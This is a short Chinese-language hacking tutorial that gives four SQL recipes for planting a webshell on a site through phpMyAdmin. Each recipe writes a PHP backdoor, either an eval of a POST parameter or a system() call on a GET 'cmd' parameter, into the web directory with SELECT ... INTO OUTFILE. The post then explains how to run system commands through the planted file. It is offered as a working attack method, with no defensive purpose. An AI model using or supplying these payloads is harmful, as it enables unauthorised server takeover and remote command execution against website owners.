前面已经提到过了如何使用phpmyadmin获得网站的webshell 详细大家可以去看下 phpmyadmin执行语句拿webshell
这里小残将针对这一文章的做一下更为详细的方法:
第一种
|
|
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/exehack.php';
DROP TABLE IF EXISTS `darkmoon`;
|
(这种方法是最为常见的成功率也比较高,懂sql语句的朋友一眼就应该可以看懂什么意思)
以上代码意思就是选择musql数据库 然后建立一个darkmoon的表然后加入一个名字为darkmoon1的字段
然后在darkmoon1的字段中插入一句话代码
然后从darkmoon1字段里面导出一句话到d:/wamp/www/exehack.php 的文件名(这里的路径就是网站的程序路径)
最后就是删除darkmoon这个表。
第二种方法
|
|
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES('<?php @eval($_POST[pass]);?>');
select darkmoon from moon into outfile 'd:/wamp/www/exehack.php';
Drop TABLE IF EXISTS moon;
|
以上方法原理基本与方法一一致
第三种方法:
|
|
select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/exehack.php'
|
第四种方法
|
|
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/wamp/www/exehack.php'
|
不同之处在于导出成功后可以直接执行DOS命令(只要权限够大)
使用方法:www.xxx.com/exehack.php?cmd= (cmd=后面直接执行dos命令)
以上4种方法一般情况下足够拿到网站的webshell权限了。
如果你知道网站的物理路径的话可以尝试一下方法或者网站的物理路径。 |
京ICP备14024464 公安备案号 京1081234